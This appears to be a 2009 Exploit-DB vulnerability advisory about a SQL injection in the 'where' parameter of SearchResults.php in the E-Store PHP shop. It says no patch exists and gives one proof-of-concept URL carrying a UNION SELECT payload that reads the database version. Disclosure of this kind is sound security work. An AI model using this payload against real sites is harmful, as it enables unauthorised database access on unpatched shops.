E-Store SQL Injection Vulnerability

vendor:

E-Store

by:

Salvatore Fresta aka Drosophila

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: E-Store

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

E-Store SQL Injection Vulnerability

The GET where parameter passed to SearchResults.php has not properly sanitised. Because of the affected query, the Magic Quotes GPC flag (php.in) may be on.

Mitigation:

No patch.

Source

Exploit-DB raw data:

E-Store SQL Injection Vulnerability

 Name              E-Store
 Vendor            http://www.getaphpsite.com

 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2009-09-03

X. INDEX

 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX
 VI.   DISCLOSURE TIMELINE


I. ABOUT THE APPLICATION

E-Store is a commercial PHP e-commerce.


II. DESCRIPTION

This application presents a SQL Injection bug.


III. ANALYSIS

Summary:

 A) SQL Injection

A) SQL Injection

The GET where parameter  passed to SearchResults.php has not
properly sanitised. Because of the affected query, the Magic
Quotes GPC flag (php.in) may be on.


IV. SAMPLE CODE

http://site/path/SearchResults.php?SearchTerm=&where=ItemName UNION
ALL SELECT 1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16%23&ord1=ItemName&ord2=asc&search1=Go!


V. FIX

No patch.